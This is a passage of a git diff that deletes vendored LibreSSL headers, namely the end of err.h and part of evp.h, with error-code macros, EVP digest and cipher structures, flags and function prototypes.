-#define JPAKEerror(r) ERR_PUT_error(ERR_LIB_JPAKE,(0xfff),(r),__FILE__,__LINE__)
-#define GOSTerror(r) ERR_PUT_error(ERR_LIB_GOST,(0xfff),(r),__FILE__,__LINE__)
-#endif
-
-#define ERR_PACK(l,f,r)		(((((unsigned long)l)&0xffL)<<24L)| \
-				((((unsigned long)f)&0xfffL)<<12L)| \
-				((((unsigned long)r)&0xfffL)))
-#define ERR_GET_LIB(l)		(int)((((unsigned long)l)>>24L)&0xffL)
-#define ERR_GET_FUNC(l)		(int)((((unsigned long)l)>>12L)&0xfffL)
-#define ERR_GET_REASON(l)	(int)((l)&0xfffL)
-#define ERR_FATAL_ERROR(l)	(int)((l)&ERR_R_FATAL)
-
-
-/* OS functions */
-#define SYS_F_FOPEN		1
-#define SYS_F_CONNECT		2
-#define SYS_F_GETSERVBYNAME	3
-#define SYS_F_SOCKET		4
-#define SYS_F_IOCTLSOCKET	5
-#define SYS_F_BIND		6
-#define SYS_F_LISTEN		7
-#define SYS_F_ACCEPT		8
-#define SYS_F_WSASTARTUP	9 /* Winsock stuff */
-#define SYS_F_OPENDIR		10
-#define SYS_F_FREAD		11
-
-
-/* reasons */
-#define ERR_R_SYS_LIB	ERR_LIB_SYS       /* 2 */
-#define ERR_R_BN_LIB	ERR_LIB_BN        /* 3 */
-#define ERR_R_RSA_LIB	ERR_LIB_RSA       /* 4 */
-#define ERR_R_DH_LIB	ERR_LIB_DH        /* 5 */
-#define ERR_R_EVP_LIB	ERR_LIB_EVP       /* 6 */
-#define ERR_R_BUF_LIB	ERR_LIB_BUF       /* 7 */
-#define ERR_R_OBJ_LIB	ERR_LIB_OBJ       /* 8 */
-#define ERR_R_PEM_LIB	ERR_LIB_PEM       /* 9 */
-#define ERR_R_DSA_LIB	ERR_LIB_DSA      /* 10 */
-#define ERR_R_X509_LIB	ERR_LIB_X509     /* 11 */
-#define ERR_R_ASN1_LIB	ERR_LIB_ASN1     /* 13 */
-#define ERR_R_CONF_LIB	ERR_LIB_CONF     /* 14 */
-#define ERR_R_CRYPTO_LIB ERR_LIB_CRYPTO  /* 15 */
-#define ERR_R_EC_LIB	ERR_LIB_EC       /* 16 */
-#define ERR_R_SSL_LIB	ERR_LIB_SSL      /* 20 */
-#define ERR_R_BIO_LIB	ERR_LIB_BIO      /* 32 */
-#define ERR_R_PKCS7_LIB	ERR_LIB_PKCS7    /* 33 */
-#define ERR_R_X509V3_LIB ERR_LIB_X509V3  /* 34 */
-#define ERR_R_PKCS12_LIB ERR_LIB_PKCS12  /* 35 */
-#define ERR_R_RAND_LIB	ERR_LIB_RAND     /* 36 */
-#define ERR_R_DSO_LIB	ERR_LIB_DSO      /* 37 */
-#define ERR_R_ENGINE_LIB ERR_LIB_ENGINE  /* 38 */
-#define ERR_R_OCSP_LIB  ERR_LIB_OCSP     /* 39 */
-#define ERR_R_UI_LIB    ERR_LIB_UI       /* 40 */
-#define ERR_R_COMP_LIB	ERR_LIB_COMP     /* 41 */
-#define ERR_R_ECDSA_LIB ERR_LIB_ECDSA	 /* 42 */
-#define ERR_R_ECDH_LIB  ERR_LIB_ECDH	 /* 43 */
-#define ERR_R_STORE_LIB ERR_LIB_STORE    /* 44 */
-#define ERR_R_TS_LIB	ERR_LIB_TS       /* 45 */
-
-#define ERR_R_NESTED_ASN1_ERROR			58
-#define ERR_R_BAD_ASN1_OBJECT_HEADER		59
-#define ERR_R_BAD_GET_ASN1_OBJECT_CALL		60
-#define ERR_R_EXPECTING_AN_ASN1_SEQUENCE	61
-#define ERR_R_ASN1_LENGTH_MISMATCH		62
-#define ERR_R_MISSING_ASN1_EOS			63
-
-/* fatal error */
-#define ERR_R_FATAL				64
-#define	ERR_R_MALLOC_FAILURE			(1|ERR_R_FATAL)
-#define	ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED	(2|ERR_R_FATAL)
-#define	ERR_R_PASSED_NULL_PARAMETER		(3|ERR_R_FATAL)
-#define	ERR_R_INTERNAL_ERROR			(4|ERR_R_FATAL)
-#define	ERR_R_DISABLED				(5|ERR_R_FATAL)
-
-/* 99 is the maximum possible ERR_R_... code, higher values
- * are reserved for the individual libraries */
-
-
-typedef struct ERR_string_data_st {
-	unsigned long error;
-	const char *string;
-} ERR_STRING_DATA;
-
-void ERR_put_error(int lib, int func, int reason, const char *file, int line);
-void ERR_set_error_data(char *data, int flags);
-
-unsigned long ERR_get_error(void);
-unsigned long ERR_get_error_line(const char **file, int *line);
-unsigned long ERR_get_error_line_data(const char **file, int *line,
-    const char **data, int *flags);
-unsigned long ERR_peek_error(void);
-unsigned long ERR_peek_error_line(const char **file, int *line);
-unsigned long ERR_peek_error_line_data(const char **file, int *line,
-    const char **data, int *flags);
-unsigned long ERR_peek_last_error(void);
-unsigned long ERR_peek_last_error_line(const char **file, int *line);
-unsigned long ERR_peek_last_error_line_data(const char **file, int *line,
-    const char **data, int *flags);
-void ERR_clear_error(void );
-char *ERR_error_string(unsigned long e, char *buf);
-void ERR_error_string_n(unsigned long e, char *buf, size_t len);
-const char *ERR_lib_error_string(unsigned long e);
-const char *ERR_func_error_string(unsigned long e);
-const char *ERR_reason_error_string(unsigned long e);
-void ERR_print_errors_cb(int (*cb)(const char *str, size_t len, void *u),
-    void *u);
-void ERR_print_errors_fp(FILE *fp);
-#ifndef OPENSSL_NO_BIO
-void ERR_print_errors(BIO *bp);
-#endif
-void ERR_asprintf_error_data(char * format, ...);
-#ifndef LIBRESSL_INTERNAL
-void ERR_add_error_data(int num, ...);
-void ERR_add_error_vdata(int num, va_list args);
-#endif
-void ERR_load_strings(int lib, ERR_STRING_DATA str[]);
-void ERR_unload_strings(int lib, ERR_STRING_DATA str[]);
-void ERR_load_ERR_strings(void);
-void ERR_load_crypto_strings(void);
-void ERR_free_strings(void);
-
-void ERR_remove_thread_state(const CRYPTO_THREADID *tid);
-#ifndef OPENSSL_NO_DEPRECATED
-void ERR_remove_state(unsigned long pid); /* if zero we look it up */
-#endif
-ERR_STATE *ERR_get_state(void);
-
-#ifndef OPENSSL_NO_LHASH
-LHASH_OF(ERR_STRING_DATA) *ERR_get_string_table(void);
-LHASH_OF(ERR_STATE) *ERR_get_err_state_table(void);
-void ERR_release_err_state_table(LHASH_OF(ERR_STATE) **hash);
-#endif
-
-int ERR_get_next_error_library(void);
-
-int ERR_set_mark(void);
-int ERR_pop_to_mark(void);
-
-/* Already defined in ossl_typ.h */
-/* typedef struct st_ERR_FNS ERR_FNS; */
-/* An application can use this function and provide the return value to loaded
- * modules that should use the application's ERR state/functionality */
-const ERR_FNS *ERR_get_implementation(void);
-/* A loaded module should call this function prior to any ERR operations using
- * the application's "ERR_FNS". */
-int ERR_set_implementation(const ERR_FNS *fns);
-
-#ifdef	__cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/evp.h b/thirdparty/libressl/include/openssl/evp.h
deleted file mode 100644
index 853abe6..0000000
--- a/thirdparty/libressl/include/openssl/evp.h
+++ /dev/null
@@ -1,1501 +0,0 @@
-/* $OpenBSD: evp.h,v 1.53 2017/08/28 17:48:02 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_ENVELOPE_H
-#define HEADER_ENVELOPE_H
-
-#include <openssl/opensslconf.h>
-
-#include <openssl/ossl_typ.h>
-
-#ifndef OPENSSL_NO_BIO
-#include <openssl/bio.h>
-#endif
-
-/*
-#define EVP_RC2_KEY_SIZE		16
-#define EVP_RC4_KEY_SIZE		16
-#define EVP_BLOWFISH_KEY_SIZE		16
-#define EVP_CAST5_KEY_SIZE		16
-#define EVP_RC5_32_12_16_KEY_SIZE	16
-*/
-#define EVP_MAX_MD_SIZE			64	/* longest known is SHA512 */
-#define EVP_MAX_KEY_LENGTH		64
-#define EVP_MAX_IV_LENGTH		16
-#define EVP_MAX_BLOCK_LENGTH		32
-
-#define PKCS5_SALT_LEN			8
-/* Default PKCS#5 iteration count */
-#define PKCS5_DEFAULT_ITER		2048
-
-#include <openssl/objects.h>
-
-#define EVP_PK_RSA	0x0001
-#define EVP_PK_DSA	0x0002
-#define EVP_PK_DH	0x0004
-#define EVP_PK_EC	0x0008
-#define EVP_PKT_SIGN	0x0010
-#define EVP_PKT_ENC	0x0020
-#define EVP_PKT_EXCH	0x0040
-#define EVP_PKS_RSA	0x0100
-#define EVP_PKS_DSA	0x0200
-#define EVP_PKS_EC	0x0400
-#define EVP_PKT_EXP	0x1000 /* <= 512 bit key */
-
-#define EVP_PKEY_NONE	NID_undef
-#define EVP_PKEY_RSA	NID_rsaEncryption
-#define EVP_PKEY_RSA2	NID_rsa
-#define EVP_PKEY_DSA	NID_dsa
-#define EVP_PKEY_DSA1	NID_dsa_2
-#define EVP_PKEY_DSA2	NID_dsaWithSHA
-#define EVP_PKEY_DSA3	NID_dsaWithSHA1
-#define EVP_PKEY_DSA4	NID_dsaWithSHA1_2
-#define EVP_PKEY_DH	NID_dhKeyAgreement
-#define EVP_PKEY_EC	NID_X9_62_id_ecPublicKey
-#define EVP_PKEY_GOSTR01 NID_id_GostR3410_2001
-#define EVP_PKEY_GOSTIMIT NID_id_Gost28147_89_MAC
-#define EVP_PKEY_HMAC	NID_hmac
-#define EVP_PKEY_CMAC	NID_cmac
-#define EVP_PKEY_GOSTR12_256 NID_id_tc26_gost3410_2012_256
-#define EVP_PKEY_GOSTR12_512 NID_id_tc26_gost3410_2012_512
-
-#ifdef	__cplusplus
-extern "C" {
-#endif
-
-/* Type needs to be a bit field
- * Sub-type needs to be for variations on the method, as in, can it do
- * arbitrary encryption.... */
-struct evp_pkey_st {
-	int type;
-	int save_type;
-	int references;
-	const EVP_PKEY_ASN1_METHOD *ameth;
-	ENGINE *engine;
-	union	{
-		char *ptr;
-#ifndef OPENSSL_NO_RSA
-		struct rsa_st *rsa;	/* RSA */
-#endif
-#ifndef OPENSSL_NO_DSA
-		struct dsa_st *dsa;	/* DSA */
-#endif
-#ifndef OPENSSL_NO_DH
-		struct dh_st *dh;	/* DH */
-#endif
-#ifndef OPENSSL_NO_EC
-		struct ec_key_st *ec;	/* ECC */
-#endif
-#ifndef OPENSSL_NO_GOST
-		struct gost_key_st *gost; /* GOST */
-#endif
-	} pkey;
-	int save_parameters;
-	STACK_OF(X509_ATTRIBUTE) *attributes; /* [ 0 ] */
-} /* EVP_PKEY */;
-
-#define EVP_PKEY_MO_SIGN	0x0001
-#define EVP_PKEY_MO_VERIFY	0x0002
-#define EVP_PKEY_MO_ENCRYPT	0x0004
-#define EVP_PKEY_MO_DECRYPT	0x0008
-
-typedef int evp_sign_method(int type, const unsigned char *m,
-    unsigned int m_length, unsigned char *sigret, unsigned int *siglen,
-    void *key);
-typedef int evp_verify_method(int type, const unsigned char *m,
-    unsigned int m_length, const unsigned char *sigbuf, unsigned int siglen,
-    void *key);
-
-#ifndef EVP_MD
-struct env_md_st {
-	int type;
-	int pkey_type;
-	int md_size;
-	unsigned long flags;
-	int (*init)(EVP_MD_CTX *ctx);
-	int (*update)(EVP_MD_CTX *ctx, const void *data, size_t count);
-	int (*final)(EVP_MD_CTX *ctx, unsigned char *md);
-	int (*copy)(EVP_MD_CTX *to, const EVP_MD_CTX *from);
-	int (*cleanup)(EVP_MD_CTX *ctx);
-
-	evp_sign_method *sign;
-	evp_verify_method *verify;
-	int required_pkey_type[5]; /*EVP_PKEY_xxx */
-	int block_size;
-	int ctx_size; /* how big does the ctx->md_data need to be */
-	/* control function */
-	int (*md_ctrl)(EVP_MD_CTX *ctx, int cmd, int p1, void *p2);
-} /* EVP_MD */;
-
-#define EVP_MD_FLAG_ONESHOT	0x0001 /* digest can only handle a single
-					* block */
-
-#define EVP_MD_FLAG_PKEY_DIGEST	0x0002 /* digest is a "clone" digest used
-					* which is a copy of an existing
-					* one for a specific public key type.
-					* EVP_dss1() etc */
-
-/* Digest uses EVP_PKEY_METHOD for signing instead of MD specific signing */
-
-#define EVP_MD_FLAG_PKEY_METHOD_SIGNATURE	0x0004
-
-/* DigestAlgorithmIdentifier flags... */
-
-#define EVP_MD_FLAG_DIGALGID_MASK		0x0018
-
-/* NULL or absent parameter accepted. Use NULL */
-
-#define EVP_MD_FLAG_DIGALGID_NULL		0x0000
-
-/* NULL or absent parameter accepted. Use NULL for PKCS#1 otherwise absent */
-
-#define EVP_MD_FLAG_DIGALGID_ABSENT		0x0008
-
-/* Custom handling via ctrl */
-
-#define EVP_MD_FLAG_DIGALGID_CUSTOM		0x0018
-
-#define EVP_MD_FLAG_FIPS	0x0400 /* Note if suitable for use in FIPS mode */
-
-/* Digest ctrls */
-
-#define	EVP_MD_CTRL_DIGALGID			0x1
-#define	EVP_MD_CTRL_MICALG			0x2
-#define	EVP_MD_CTRL_SET_KEY			0x3
-#define	EVP_MD_CTRL_GOST_SET_SBOX		0x4
-
-/* Minimum Algorithm specific ctrl value */
-
-#define	EVP_MD_CTRL_ALG_CTRL			0x1000
-
-#define EVP_PKEY_NULL_method	NULL,NULL,{0,0,0,0}
-
-#ifndef OPENSSL_NO_DSA
-#define EVP_PKEY_DSA_method	(evp_sign_method *)DSA_sign, \
-				(evp_verify_method *)DSA_verify, \
-				{EVP_PKEY_DSA,EVP_PKEY_DSA2,EVP_PKEY_DSA3, \
-					EVP_PKEY_DSA4,0}
-#else
-#define EVP_PKEY_DSA_method	EVP_PKEY_NULL_method
-#endif
-
-#ifndef OPENSSL_NO_ECDSA
-#define EVP_PKEY_ECDSA_method   (evp_sign_method *)ECDSA_sign, \
-				(evp_verify_method *)ECDSA_verify, \
-                                 {EVP_PKEY_EC,0,0,0}
-#else
-#define EVP_PKEY_ECDSA_method   EVP_PKEY_NULL_method
-#endif
-
-#ifndef OPENSSL_NO_RSA
-#define EVP_PKEY_RSA_method	(evp_sign_method *)RSA_sign, \
-				(evp_verify_method *)RSA_verify, \
-				{EVP_PKEY_RSA,EVP_PKEY_RSA2,0,0}
-#define EVP_PKEY_RSA_ASN1_OCTET_STRING_method \
-				(evp_sign_method *)RSA_sign_ASN1_OCTET_STRING, \
-				(evp_verify_method *)RSA_verify_ASN1_OCTET_STRING, \
-				{EVP_PKEY_RSA,EVP_PKEY_RSA2,0,0}
-#else
-#define EVP_PKEY_RSA_method	EVP_PKEY_NULL_method
-#define EVP_PKEY_RSA_ASN1_OCTET_STRING_method EVP_PKEY_NULL_method
-#endif
-
-#endif /* !EVP_MD */
-
-struct env_md_ctx_st {
-	const EVP_MD *digest;
-	ENGINE *engine; /* functional reference if 'digest' is ENGINE-provided */
-	unsigned long flags;
-	void *md_data;
-	/* Public key context for sign/verify */
-	EVP_PKEY_CTX *pctx;
-	/* Update function: usually copied from EVP_MD */
-	int (*update)(EVP_MD_CTX *ctx, const void *data, size_t count);
-} /* EVP_MD_CTX */;
-
-/* values for EVP_MD_CTX flags */
-
-#define EVP_MD_CTX_FLAG_ONESHOT		0x0001 /* digest update will be called
-						* once only */
-#define EVP_MD_CTX_FLAG_CLEANED		0x0002 /* context has already been
-						* cleaned */
-#define EVP_MD_CTX_FLAG_REUSE		0x0004 /* Don't free up ctx->md_data
-						* in EVP_MD_CTX_cleanup */
-/* FIPS and pad options are ignored in 1.0.0, definitions are here
- * so we don't accidentally reuse the values for other purposes.
- */
-
-#define EVP_MD_CTX_FLAG_NON_FIPS_ALLOW	0x0008	/* Allow use of non FIPS digest
-						 * in FIPS mode */
-
-/* The following PAD options are also currently ignored in 1.0.0, digest
- * parameters are handled through EVP_DigestSign*() and EVP_DigestVerify*()
- * instead.
- */
-#define EVP_MD_CTX_FLAG_PAD_MASK	0xF0	/* RSA mode to use */
-#define EVP_MD_CTX_FLAG_PAD_PKCS1	0x00	/* PKCS#1 v1.5 mode */
-#define EVP_MD_CTX_FLAG_PAD_X931	0x10	/* X9.31 mode */
-#define EVP_MD_CTX_FLAG_PAD_PSS		0x20	/* PSS mode */
-
-#define EVP_MD_CTX_FLAG_NO_INIT		0x0100 /* Don't initialize md_data */
-
-struct evp_cipher_st {
-	int nid;
-	int block_size;
-	int key_len;		/* Default value for variable length ciphers */
-	int iv_len;
-	unsigned long flags;	/* Various flags */
-	int (*init)(EVP_CIPHER_CTX *ctx, const unsigned char *key,
-	    const unsigned char *iv, int enc);	/* init key */
-	int (*do_cipher)(EVP_CIPHER_CTX *ctx, unsigned char *out,
-	    const unsigned char *in, size_t inl);/* encrypt/decrypt data */
-	int (*cleanup)(EVP_CIPHER_CTX *); /* cleanup ctx */
-	int ctx_size;		/* how big ctx->cipher_data needs to be */
-	int (*set_asn1_parameters)(EVP_CIPHER_CTX *, ASN1_TYPE *); /* Populate a ASN1_TYPE with parameters */
-	int (*get_asn1_parameters)(EVP_CIPHER_CTX *, ASN1_TYPE *); /* Get parameters from a ASN1_TYPE */
-	int (*ctrl)(EVP_CIPHER_CTX *, int type, int arg, void *ptr); /* Miscellaneous operations */
-	void *app_data;		/* Application data */
-} /* EVP_CIPHER */;
-
-/* Values for cipher flags */
-
-/* Modes for ciphers */
-
-#define		EVP_CIPH_STREAM_CIPHER		0x0
-#define		EVP_CIPH_ECB_MODE		0x1
-#define		EVP_CIPH_CBC_MODE		0x2
-#define		EVP_CIPH_CFB_MODE		0x3
-#define		EVP_CIPH_OFB_MODE		0x4
-#define		EVP_CIPH_CTR_MODE		0x5
-#define		EVP_CIPH_GCM_MODE		0x6
-#define		EVP_CIPH_CCM_MODE		0x7
-#define		EVP_CIPH_XTS_MODE		0x10001
-#define 	EVP_CIPH_MODE			0xF0007
-/* Set if variable length cipher */
-#define 	EVP_CIPH_VARIABLE_LENGTH	0x8
-/* Set if the iv handling should be done by the cipher itself */
-#define 	EVP_CIPH_CUSTOM_IV		0x10
-/* Set if the cipher's init() function should be called if key is NULL */
-#define 	EVP_CIPH_ALWAYS_CALL_INIT	0x20
-/* Call ctrl() to init cipher parameters */
-#define 	EVP_CIPH_CTRL_INIT		0x40
-/* Don't use standard key length function */
-#define 	EVP_CIPH_CUSTOM_KEY_LENGTH	0x80
-/* Don't use standard block padding */
-#define 	EVP_CIPH_NO_PADDING		0x100
-/* cipher handles random key generation */
-#define 	EVP_CIPH_RAND_KEY		0x200
-/* cipher has its own additional copying logic */
-#define 	EVP_CIPH_CUSTOM_COPY		0x400
-/* Allow use default ASN1 get/set iv */
-#define		EVP_CIPH_FLAG_DEFAULT_ASN1	0x1000
-/* Buffer length in bits not bytes: CFB1 mode only */
-#define		EVP_CIPH_FLAG_LENGTH_BITS	0x2000
-/* Note if suitable for use in FIPS mode */
-#define		EVP_CIPH_FLAG_FIPS		0x4000
-/* Allow non FIPS cipher in FIPS mode */
-#define		EVP_CIPH_FLAG_NON_FIPS_ALLOW	0x8000
-/* Cipher handles any and all padding logic as well
- * as finalisation.
- */
-#define 	EVP_CIPH_FLAG_CUSTOM_CIPHER	0x100000
-#define		EVP_CIPH_FLAG_AEAD_CIPHER	0x200000
-
-/* ctrl() values */
-
-#define		EVP_CTRL_INIT			0x0
-#define 	EVP_CTRL_SET_KEY_LENGTH		0x1
-#define 	EVP_CTRL_GET_RC2_KEY_BITS	0x2
-#define 	EVP_CTRL_SET_RC2_KEY_BITS	0x3
-#define 	EVP_CTRL_GET_RC5_ROUNDS		0x4
-#define 	EVP_CTRL_SET_RC5_ROUNDS		0x5
-#define 	EVP_CTRL_RAND_KEY		0x6
-#define 	EVP_CTRL_PBE_PRF_NID		0x7
-#define 	EVP_CTRL_COPY			0x8
-#define 	EVP_CTRL_GCM_SET_IVLEN		0x9
-#define 	EVP_CTRL_GCM_GET_TAG		0x10
-#define 	EVP_CTRL_GCM_SET_TAG		0x11
-#define		EVP_CTRL_GCM_SET_IV_FIXED	0x12
-#define		EVP_CTRL_GCM_IV_GEN		0x13
-#define		EVP_CTRL_CCM_SET_IVLEN		EVP_CTRL_GCM_SET_IVLEN
-#define		EVP_CTRL_CCM_GET_TAG		EVP_CTRL_GCM_GET_TAG
-#define		EVP_CTRL_CCM_SET_TAG		EVP_CTRL_GCM_SET_TAG
-#define		EVP_CTRL_CCM_SET_L		0x14
-#define		EVP_CTRL_CCM_SET_MSGLEN		0x15
-/* AEAD cipher deduces payload length and returns number of bytes
- * required to store MAC and eventual padding. Subsequent call to
- * EVP_Cipher even appends/verifies MAC.
- */
-#define		EVP_CTRL_AEAD_TLS1_AAD		0x16
-/* Used by composite AEAD ciphers, no-op in GCM, CCM... */
-#define		EVP_CTRL_AEAD_SET_MAC_KEY	0x17
-/* Set the GCM invocation field, decrypt only */
-#define		EVP_CTRL_GCM_SET_IV_INV		0x18
-/* Set the S-BOX NID for GOST ciphers */
-#define		EVP_CTRL_GOST_SET_SBOX		0x19
-
-/* GCM TLS constants */
-/* Length of fixed part of IV derived from PRF */
-#define EVP_GCM_TLS_FIXED_IV_LEN			4
-/* Length of explicit part of IV part of TLS records */
-#define EVP_GCM_TLS_EXPLICIT_IV_LEN			8
-/* Length of tag for TLS */
-#define EVP_GCM_TLS_TAG_LEN				16
-
-typedef struct evp_cipher_info_st {
-	const EVP_CIPHER *cipher;
-	unsigned char iv[EVP_MAX_IV_LENGTH];
-} EVP_CIPHER_INFO;
-
-struct evp_cipher_ctx_st {
-	const EVP_CIPHER *cipher;
-	ENGINE *engine;	/* functional reference if 'cipher' is ENGINE-provided */
-	int encrypt;		/* encrypt or decrypt */
-	int buf_len;		/* number we have left */
-
-	unsigned char  oiv[EVP_MAX_IV_LENGTH];	/* original iv */
-	unsigned char  iv[EVP_MAX_IV_LENGTH];	/* working iv */
-	unsigned char buf[EVP_MAX_BLOCK_LENGTH];/* saved partial block */
-	int num;				/* used by cfb/ofb/ctr mode */
-
-	void *app_data;		/* application stuff */
-	int key_len;		/* May change for variable length cipher */
-	unsigned long flags;	/* Various flags */
-	void *cipher_data; /* per EVP data */
-	int final_used;
-	int block_mask;
-	unsigned char final[EVP_MAX_BLOCK_LENGTH];/* possible final block */
-} /* EVP_CIPHER_CTX */;
-
-typedef struct evp_Encode_Ctx_st {
-	int num;	/* number saved in a partial encode/decode */
-	int length;	/* The length is either the output line length
-			 * (in input bytes) or the shortest input line
-			 * length that is ok.  Once decoding begins,
-			 * the length is adjusted up each time a longer
-			 * line is decoded */
-	unsigned char enc_data[80];	/* data to encode */
-	int line_num;	/* number read on current line */
-	int expect_nl;
-} EVP_ENCODE_CTX;
-
-/* Password based encryption function */
-typedef int (EVP_PBE_KEYGEN)(EVP_CIPHER_CTX *ctx, const char *pass, int passlen,
-    ASN1_TYPE *param, const EVP_CIPHER *cipher, const EVP_MD *md, int en_de);
-
-#ifndef OPENSSL_NO_RSA
-#define EVP_PKEY_assign_RSA(pkey,rsa) EVP_PKEY_assign((pkey),EVP_PKEY_RSA,\
-					(char *)(rsa))
-#endif
-
-#ifndef OPENSSL_NO_DSA
-#define EVP_PKEY_assign_DSA(pkey,dsa) EVP_PKEY_assign((pkey),EVP_PKEY_DSA,\
-					(char *)(dsa))
-#endif
-
-#ifndef OPENSSL_NO_DH
-#define EVP_PKEY_assign_DH(pkey,dh) EVP_PKEY_assign((pkey),EVP_PKEY_DH,\
-					(char *)(dh))
-#endif
-
-#ifndef OPENSSL_NO_EC
-#define EVP_PKEY_assign_EC_KEY(pkey,eckey) EVP_PKEY_assign((pkey),EVP_PKEY_EC,\
-                                        (char *)(eckey))
-#endif
-
-#ifndef OPENSSL_NO_GOST
-#define EVP_PKEY_assign_GOST(pkey,gostkey) EVP_PKEY_assign((pkey),EVP_PKEY_GOSTR01,\
-                                        (char *)(gostkey))
-#endif
-
-/* Add some extra combinations */
-#define EVP_get_digestbynid(a) EVP_get_digestbyname(OBJ_nid2sn(a))
-#define EVP_get_digestbyobj(a) EVP_get_digestbynid(OBJ_obj2nid(a))
-#define EVP_get_cipherbynid(a) EVP_get_cipherbyname(OBJ_nid2sn(a))
-#define EVP_get_cipherbyobj(a) EVP_get_cipherbynid(OBJ_obj2nid(a))
-
-int EVP_MD_type(const EVP_MD *md);
-#define EVP_MD_nid(e)			EVP_MD_type(e)
-#define EVP_MD_name(e)			OBJ_nid2sn(EVP_MD_nid(e))
-int EVP_MD_pkey_type(const EVP_MD *md);
-int EVP_MD_size(const EVP_MD *md);
-int EVP_MD_block_size(const EVP_MD *md);
-unsigned long EVP_MD_flags(const EVP_MD *md);
-
-const EVP_MD *EVP_MD_CTX_md(const EVP_MD_CTX *ctx);
-#define EVP_MD_CTX_size(e)		EVP_MD_size(EVP_MD_CTX_md(e))
-#define EVP_MD_CTX_block_size(e)	EVP_MD_block_size(EVP_MD_CTX_md(e))
-#define EVP_MD_CTX_type(e)		EVP_MD_type(EVP_MD_CTX_md(e))
-
-int EVP_CIPHER_nid(const EVP_CIPHER *cipher);
-#define EVP_CIPHER_name(e)		OBJ_nid2sn(EVP_CIPHER_nid(e))
-int EVP_CIPHER_block_size(const EVP_CIPHER *cipher);
-int EVP_CIPHER_key_length(const EVP_CIPHER *cipher);
-int EVP_CIPHER_iv_length(const EVP_CIPHER *cipher);
-unsigned long EVP_CIPHER_flags(const EVP_CIPHER *cipher);
-#define EVP_CIPHER_mode(e)		(EVP_CIPHER_flags(e) & EVP_CIPH_MODE)
-
-const EVP_CIPHER * EVP_CIPHER_CTX_cipher(const EVP_CIPHER_CTX *ctx);
-int EVP_CIPHER_CTX_nid(const EVP_CIPHER_CTX *ctx);
-int EVP_CIPHER_CTX_block_size(const EVP_CIPHER_CTX *ctx);
-int EVP_CIPHER_CTX_key_length(const EVP_CIPHER_CTX *ctx);
-int EVP_CIPHER_CTX_iv_length(const EVP_CIPHER_CTX *ctx);
-int EVP_CIPHER_CTX_copy(EVP_CIPHER_CTX *out, const EVP_CIPHER_CTX *in);
-void * EVP_CIPHER_CTX_get_app_data(const EVP_CIPHER_CTX *ctx);
-void EVP_CIPHER_CTX_set_app_data(EVP_CIPHER_CTX *ctx, void *data);
-#define EVP_CIPHER_CTX_type(c)         EVP_CIPHER_type(EVP_CIPHER_CTX_cipher(c))
-unsigned long EVP_CIPHER_CTX_flags(const EVP_CIPHER_CTX *ctx);
-#define EVP_CIPHER_CTX_mode(e)		(EVP_CIPHER_CTX_flags(e) & EVP_CIPH_MODE)
-
-#define EVP_ENCODE_LENGTH(l)	(((l+2)/3*4)+(l/48+1)*2+80)
-#define EVP_DECODE_LENGTH(l)	((l+3)/4*3+80)
-
-#define EVP_SignInit_ex(a,b,c)		EVP_DigestInit_ex(a,b,c)
-#define EVP_SignInit(a,b)		EVP_DigestInit(a,b)
-#define EVP_SignUpdate(a,b,c)		EVP_DigestUpdate(a,b,c)
-#define	EVP_VerifyInit_ex(a,b,c)	EVP_DigestInit_ex(a,b,c)
-#define	EVP_VerifyInit(a,b)		EVP_DigestInit(a,b)
-#define	EVP_VerifyUpdate(a,b,c)		EVP_DigestUpdate(a,b,c)
-#define EVP_OpenUpdate(a,b,c,d,e)	EVP_DecryptUpdate(a,b,c,d,e)
-#define EVP_SealUpdate(a,b,c,d,e)	EVP_EncryptUpdate(a,b,c,d,e)
-#define EVP_DigestSignUpdate(a,b,c)	EVP_DigestUpdate(a,b,c)
